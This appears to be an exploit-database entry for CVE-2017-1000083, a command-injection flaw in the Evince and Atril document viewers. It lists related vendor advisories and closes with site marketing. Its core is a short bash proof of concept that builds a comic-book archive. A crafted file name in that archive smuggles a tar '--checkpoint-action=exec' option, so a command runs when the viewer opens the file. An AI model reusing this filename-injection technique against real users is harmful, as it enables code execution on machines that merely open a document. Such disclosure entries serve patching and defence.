| Reporter | Title | Published | Views | Family All 94 |
|---|---|---|---|---|
| evince and atril -- command injection vulnerability in CBT handler | 6 Jul 201700:00 | – | freebsd | |
| Evince 3.24.0 - Command Injection Exploit | 13 Nov 201800:00 | – | zdt | |
| Evince CBT File Command Injection Exploit | 7 Feb 201900:00 | – | zdt | |
| CVE-2017-1000083 | 5 Sep 201700:00 | – | attackerkb | |
| CVE-2017-1000083 | 5 Sep 201706:00 | – | alpinelinux | |
| [ASA-201707-14] evince: arbitrary command execution | 14 Jul 201700:00 | – | archlinux | |
| CentOS 7 : evince (CESA-2017:2388) | 25 Aug 201700:00 | – | nessus | |
| Debian DLA-1031-1 : evince security update | 19 Jul 201700:00 | – | nessus | |
| Debian DSA-3911-1 : evince - security update | 17 Jul 201700:00 | – | nessus | |
| Debian DSA-3916-1 : atril - security update | 24 Jul 201700:00 | – | nessus |
# Exploit Title: evince command line injection
# Date: 2017-09-05
# Exploit Author: Matlink
# Vendor Homepage: https://wiki.gnome.org/Apps/Evince
# Software Link: https://wiki.gnome.org/Apps/Evince
# Version: 3.24.0
# Tested on: Debian sid
# CVE : CVE-2017-1000083
Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083
#! /bin/bash
# define the payload
export PAYLOAD="firefox google.com"
# Create the malicious .cbt file
dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000
tar cvf poc.cbt *.jpg
# Run the malicious file
evince poc.cbtData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation